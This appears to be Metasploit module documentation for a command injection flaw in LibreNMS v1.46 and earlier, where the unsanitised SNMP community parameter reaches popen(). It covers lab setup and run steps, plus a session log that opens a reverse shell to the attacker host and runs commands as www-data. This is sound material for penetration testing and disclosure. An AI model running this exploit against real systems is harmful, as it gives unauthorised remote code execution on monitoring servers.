Skip to content

Latest commit

 

History

History
65 lines (53 loc) · 2.81 KB

librenms_addhost_cmd_inject.md

File metadata and controls

65 lines (53 loc) · 2.81 KB
Raw

Description

In LibreNMS v1.46 and below, there exists a command injection vulnerability in capture.inc.php. The vulnerable functionality is intended to run a command such as snmpwalk and save the output as a file. The community parameter is an unsanitized parameter retrieved through a POST request to addhost, and it is used to build the command that is executed in the capture.inc.php functionality. The final command is passed to the popen() function, which results in execution of arbitrary code.

This module has been tested on LibreNMS v1.46 and v1.45.

Vulnerable Application

A pre-built OVA can be downloaded via a LibreNMS repo.

Additionally, vulnerable versions of LibreNMS for Ubuntu can be manually installed using the instructions here. In the command composer create-project --no-dev --keep-vcs librenms/librenms librenms dev-master, replace dev-master with a vulnerable version of the software, ex: 1.46.

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/linux/http/librenms_addhost_cmd_inject
  4. Do: set RHOSTS <ip>
  5. Do: set USERNAME <user>
  6. Do: set PASSWORD <pass>
  7. Do: run
  8. You should get a shell.

Scenarios

Tested on LibreNMS 1.46 on Ubuntu 18.04

msf5 > use exploit/linux/http/librenms_addhost_cmd_inject
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set rhosts 192.168.37.143
rhosts => 192.168.37.143
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set username blah
username => blah
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set password password
password => password
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > run

[*] Started reverse TCP double handler on 192.168.37.1:4444 
[*] Successfully logged into LibreNMS
[+] Successfully added device with hostname dFEzcH
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[+] Successfully deleted device with hostname dFEzcH and id #126
[*] Command: echo 38eJIFZsiRl3Er48;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "Trying: not found\r\nsh: 2: Connected: not found\r\nsh: 3: Escape: not found\r\n38eJIFZsiRl3Er48\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.143:55380) at 2019-05-29 15:26:02 -0500

whoami
www-data
uname -a
Linux ubuntu 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux